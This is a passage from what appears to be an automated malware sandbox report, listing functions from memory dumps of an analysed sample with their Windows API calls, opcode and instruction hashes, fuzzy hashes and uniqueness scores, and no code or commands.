                                                                                                                • Instruction Fuzzy Hash: D9C12CB4A00225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A9A9, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 269COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: d33e0418d8eaf12716374f7cc189732a07f03d3c815205a9b6d1c8be13141d51
                                                                                                                • Instruction ID: 583815b0658947aa5f7c9e5927459600e7d6e75ff7f354665d6c37d5c3b1ae8e
                                                                                                                • Opcode Fuzzy Hash: d33e0418d8eaf12716374f7cc189732a07f03d3c815205a9b6d1c8be13141d51
                                                                                                                • Instruction Fuzzy Hash: 95C10BB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A9F1, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 262COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 057b5a1a8ef7702f939f33b0564281bb02e33e903740efa6bf925d23eef773a1
                                                                                                                • Instruction ID: 6204996fd653f309a81775f53772b97ff6267364cc9cf761d2c8d68f60570b22
                                                                                                                • Opcode Fuzzy Hash: 057b5a1a8ef7702f939f33b0564281bb02e33e903740efa6bf925d23eef773a1
                                                                                                                • Instruction Fuzzy Hash: FAC12CB4A01225CFCB68AF24C85469DB7B6BF88305F5088EAD609A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AA39, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 253COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 01ac65e542e7800a7061f95f2ac64295841086ca43a88137cacc06214a5ca517
                                                                                                                • Instruction ID: 8ef1254d204c7c640194abe33a32b4d6476af9a8dc00d7060f7cf9612a7fcfaf
                                                                                                                • Opcode Fuzzy Hash: 01ac65e542e7800a7061f95f2ac64295841086ca43a88137cacc06214a5ca517
                                                                                                                • Instruction Fuzzy Hash: 3EB11CB4A00225CFDB68AF24C85469DB7B6BF88305F5088EAD609A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AA8B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 244COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 84d3f21b7f24b9b844e25376101efbda92536559e313aa9342c5905202256983
                                                                                                                • Instruction ID: e422bf895d3709ddd4f90813a5b3664b86db25a6aa3b8306a1ea58f24e2d2462
                                                                                                                • Opcode Fuzzy Hash: 84d3f21b7f24b9b844e25376101efbda92536559e313aa9342c5905202256983
                                                                                                                • Instruction Fuzzy Hash: 8EB11CB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AAD3, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 237COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 108d1743ed3b03a89f877abdcc15d3fe8681fa3b8c5fed76a84ba4a4c379c369
                                                                                                                • Instruction ID: d3bca36d71c13668c307e874dcd55e26501a84716fa8493fcb5cfc55462b7b9e
                                                                                                                • Opcode Fuzzy Hash: 108d1743ed3b03a89f877abdcc15d3fe8681fa3b8c5fed76a84ba4a4c379c369
                                                                                                                • Instruction Fuzzy Hash: 5BA12BB0A00225CFDB68AF24C85469DB7B6BF88305F5088EAD909A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AB1B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 42c5945cbe71ef96d0875793becfb801d770ea3e4a57a9d2c5833e560e38dfc0
                                                                                                                • Instruction ID: 7ef67e5be03dbc6785f4f7fa09722130de8f362613c7f675002cb9e820a32f51
                                                                                                                • Opcode Fuzzy Hash: 42c5945cbe71ef96d0875793becfb801d770ea3e4a57a9d2c5833e560e38dfc0
                                                                                                                • Instruction Fuzzy Hash: E5A12BB4A00225CBDB68AF24C8546ADB7B6BF88305F5088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AB63, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 3a0726dacf2c3997b684071fb570bb6048d941688cb4d20f8258ad8f2848b184
                                                                                                                • Instruction ID: 5f9c4f25fc2c86ea08c40cf227e080acedbe1ca2c5fd95acd052d21856daa1d2
                                                                                                                • Opcode Fuzzy Hash: 3a0726dacf2c3997b684071fb570bb6048d941688cb4d20f8258ad8f2848b184
                                                                                                                • Instruction Fuzzy Hash: 98A13AB0A00225CBDB68AF34C8546ADB7B6BF88305F5088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058ABAB, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 37f8b7fdc07c21b70603db7f992fd70bc76db03680ae4b449afce8f1d93922b5
                                                                                                                • Instruction ID: 5ffc9fbea2f9dea109a1fa4282db58f9c3d4fa98a3a43b2539fcf47814bbfbaf
                                                                                                                • Opcode Fuzzy Hash: 37f8b7fdc07c21b70603db7f992fd70bc76db03680ae4b449afce8f1d93922b5
                                                                                                                • Instruction Fuzzy Hash: FE913AB0A00225CBDB68AF34C8546ADB7B6BF88305F6088E9D509A7740CF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058ABE7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: c27204a1e85657be98a941881277f6651a2b2fbe104676bf066c9a939faad11a
                                                                                                                • Instruction ID: b6cfca0e3bd56d6b27b2b39864fdec33824ecbb7541737973ca5374a00980ea6
                                                                                                                • Opcode Fuzzy Hash: c27204a1e85657be98a941881277f6651a2b2fbe104676bf066c9a939faad11a
                                                                                                                • Instruction Fuzzy Hash: CE913BB0A00225CBDB68AF34C8946ADB7B6BF88305F5088E9D509A7750DF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AC2F, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 00511de4a2cfe40f4de1a40d29d75e4dbd3d5e2b1cf05ae6ab845204290debf0
                                                                                                                • Instruction ID: 7579c5324b361c3f87eebd16986f27d4c70c3b3d16899987156125f650412927
                                                                                                                • Opcode Fuzzy Hash: 00511de4a2cfe40f4de1a40d29d75e4dbd3d5e2b1cf05ae6ab845204290debf0
                                                                                                                • Instruction Fuzzy Hash: 50813BB0A00225CBDB68AF34C8586ADB7B6BF88305F5088E9D509A7750DF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058AC6B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 6b91dced9e26ff5bac239299a1224f68dd91b42e049c2f41b703d18955ae595f
                                                                                                                • Instruction ID: d727f76ce0979eb7f06239de8114d2306208766a4f252926d0e09678f533bd61
                                                                                                                • Opcode Fuzzy Hash: 6b91dced9e26ff5bac239299a1224f68dd91b42e049c2f41b703d18955ae595f
                                                                                                                • Instruction Fuzzy Hash: 8D813CB0A00225CBDB68AF34C8587ADB7B6BF88305F5088A9D509E7750DF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058ACA7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: 37e663592a177b6d1613b9cceac17dfe84b847950fdd2905a5f2eee0e597006c
                                                                                                                • Instruction ID: 2cf3c2a61a54837bd991d3030efb8b5ca0e32cc4faa404df5e4cc2debcf8130a
                                                                                                                • Opcode Fuzzy Hash: 37e663592a177b6d1613b9cceac17dfe84b847950fdd2905a5f2eee0e597006c
                                                                                                                • Instruction Fuzzy Hash: 77713CB0A01225CBDB68AB34C8587ADB7B6BF88305F5088E9D509E7740DF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058ACEF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g
                                                                                                                • API String ID: 6842923-1485614159
                                                                                                                • Opcode ID: f08dcbf47a022f87c9bb64b71787ead7689ee9d1b873ed4d531aa285c41b3f4a
                                                                                                                • Instruction ID: 8273fdc962f378ec1d8b1cf06db5cae5d5ef465216f22bc2d51042853543baa3
                                                                                                                • Opcode Fuzzy Hash: f08dcbf47a022f87c9bb64b71787ead7689ee9d1b873ed4d531aa285c41b3f4a
                                                                                                                • Instruction Fuzzy Hash: CC713EB0A00225CBDB68AB34C8587ADB7B6BF88305F5088A9D509E7750DF349E85CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00C4F140, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00C4F1F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704554241.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3660427363-0
                                                                                                                • Opcode ID: 208fe0c8247d2d7ea5923455d8687377b7a05e9bea30172dc29978746bf68fcf
                                                                                                                • Instruction ID: bb077ecb1d2f671fdaff8ec5e1beea5388c1cbdd82af93a0fd5d5eb59ae920fa
                                                                                                                • Opcode Fuzzy Hash: 208fe0c8247d2d7ea5923455d8687377b7a05e9bea30172dc29978746bf68fcf
                                                                                                                • Instruction Fuzzy Hash: 4B31DEB5D00258DFCB20CF9AC984A8EBFF5BF48310F55812AE818AB314D7749905CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00724BA8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00724C23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704441037.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 597edebfa05bc103f2ff7c13dc5b8e49ff6121ccdebc7c69da87544bf0e0309f
                                                                                                                • Instruction ID: c384fbe5abbe91e7db5a44d413641ec2446f1f175dc642ea94b4076a292c0e36
                                                                                                                • Opcode Fuzzy Hash: 597edebfa05bc103f2ff7c13dc5b8e49ff6121ccdebc7c69da87544bf0e0309f
                                                                                                                • Instruction Fuzzy Hash: 312113B59002199FCB14CF99D844BEEFBF4EF88310F10842AE429A7250C778A944CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED48C, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4c683f1446c0328fab1389d0950c913baaaaf7f590b9927afb5ce9a804af7b37
                                                                                                                • Instruction ID: 3d4fd6c5ed97bbafe8c78ecd449e6b0df968e62f83c10e7e86d06f5df66f2106
                                                                                                                • Opcode Fuzzy Hash: 4c683f1446c0328fab1389d0950c913baaaaf7f590b9927afb5ce9a804af7b37
                                                                                                                • Instruction Fuzzy Hash: 72212871504284DFCB16DF11D9C0B2ABF65FB98328F358669D9054B6C6C336E806CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED578, Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3093d0eafa7a1df100efef66fbef37ab5096f112aad0f9ec86b26f58a417e50a
                                                                                                                • Instruction ID: 9a063801b6cf5ab9250979f315b4191b3e2014ae2c8752b37e42d663f528a348
                                                                                                                • Opcode Fuzzy Hash: 3093d0eafa7a1df100efef66fbef37ab5096f112aad0f9ec86b26f58a417e50a
                                                                                                                • Instruction Fuzzy Hash: 0D214975504284DFCF16CF10D9C0B2ABF65FB98318F3586ADE9094B686C336D846C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003FD01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704231507.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a52c9738b2c33cb4d071943a3199f381caf15012e276d3959349ce7507eb949f
                                                                                                                • Instruction ID: ae7acb79e2572585b73133452f5bf7ae5a624750831d18e3972e3290fd9517c5
                                                                                                                • Opcode Fuzzy Hash: a52c9738b2c33cb4d071943a3199f381caf15012e276d3959349ce7507eb949f
                                                                                                                • Instruction Fuzzy Hash: 34212574604208DFCB16DF10D888B26BBA6EB88314F20C569DA0A4B746CB3AD806CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003FE674, Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704231507.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 855150cd3e560e72f9071644c9a76d5f5a2c98891570ea9a1a0c85d95abc45c7
                                                                                                                • Instruction ID: df1643d57d4f6b01ef37d4f61221e2714d21536dfe7f5b12c54f6ba5e3901317
                                                                                                                • Opcode Fuzzy Hash: 855150cd3e560e72f9071644c9a76d5f5a2c98891570ea9a1a0c85d95abc45c7
                                                                                                                • Instruction Fuzzy Hash: DD213775604248DFCB06DF10D9C4B36BBA5FB88318F24C5ADDA098B662C336E809CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003FD006, Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704231507.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 799b4d73400bc61d51ba1660f3594f6d5ef7ef6698332cb61c6d8cc211fa8385
                                                                                                                • Instruction ID: 243c0e72c6efc348ea9e32042552671f1d03723e9b7335e9c0217e918bf6a044
                                                                                                                • Opcode Fuzzy Hash: 799b4d73400bc61d51ba1660f3594f6d5ef7ef6698332cb61c6d8cc211fa8385
                                                                                                                • Instruction Fuzzy Hash: D3218E755093C48FCB13CF20D994715BF72EB46314F29C5EAD8498B6A7C33A980ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED487, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8eb0e7554551c20434284b2bc08a3fcbe7d7f781755aa3ded0eef7d76f79ea3
                                                                                                                • Instruction ID: 16e0bc0b971a06a1f4ea8a23d4709c04f9db245fe3e63fc40124d452fb3a5c56
                                                                                                                • Opcode Fuzzy Hash: b8eb0e7554551c20434284b2bc08a3fcbe7d7f781755aa3ded0eef7d76f79ea3
                                                                                                                • Instruction Fuzzy Hash: B211E676404280CFCF16CF10D9C4B1ABF72FB95314F24C6A9D8090B696C336D85ACBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED573, Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8eb0e7554551c20434284b2bc08a3fcbe7d7f781755aa3ded0eef7d76f79ea3
                                                                                                                • Instruction ID: 66f68595f0cbe9c75b63ea0d564f3166e4ebd7d48e9a03715c92319c66ca2c14
                                                                                                                • Opcode Fuzzy Hash: b8eb0e7554551c20434284b2bc08a3fcbe7d7f781755aa3ded0eef7d76f79ea3
                                                                                                                • Instruction Fuzzy Hash: C511D376404280CFCF16CF10D5C4B1ABF71FB98314F28C6A9D8094B656C33AD85ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003FE66F, Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704231507.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6a77f61a85079fca331e19ea2d722d72feebbd14a6cdefc68577869a30c2b211
                                                                                                                • Instruction ID: d40e8c7d5ca61db0422d1ff5ff3dd9b5e551843cbe3261e527a3e9f2641413ee
                                                                                                                • Opcode Fuzzy Hash: 6a77f61a85079fca331e19ea2d722d72feebbd14a6cdefc68577869a30c2b211
                                                                                                                • Instruction Fuzzy Hash: 2E11BB79504284CFCB16DF10D5C4B25BBA1FB88314F28C6AAD9494B666C33AE80ACB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED795, Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c3c8909400786bb6d79017c58084e86f1ae0b296049c58f95042e6f88ae64f00
                                                                                                                • Instruction ID: 9d001fd215bb40fe19e94f24133603a6cbd08ba29c2561c524a4ae380b5a311f
                                                                                                                • Opcode Fuzzy Hash: c3c8909400786bb6d79017c58084e86f1ae0b296049c58f95042e6f88ae64f00
                                                                                                                • Instruction Fuzzy Hash: A301F7310083A09AD7218F27C884B67BFD8DF41324F1AC65ADE155B6C2C3389C40C7B2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003ED794, Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704214589.00000000003ED000.00000040.00000001.sdmp, Offset: 003ED000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd6c32b203d6ec3c32c0836ec950d4b07537d300f29daf2264bbc94029918e65
                                                                                                                • Instruction ID: 4238c6624bb8e19697671d1b1ff42290d62ffdd005fa63b2edf40e8a1619ca5e
                                                                                                                • Opcode Fuzzy Hash: fd6c32b203d6ec3c32c0836ec950d4b07537d300f29daf2264bbc94029918e65
                                                                                                                • Instruction Fuzzy Hash: DCF0C2714083909EE7208F16C888B62FF98EF41334F19C55AED185B286C3789C44CBB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions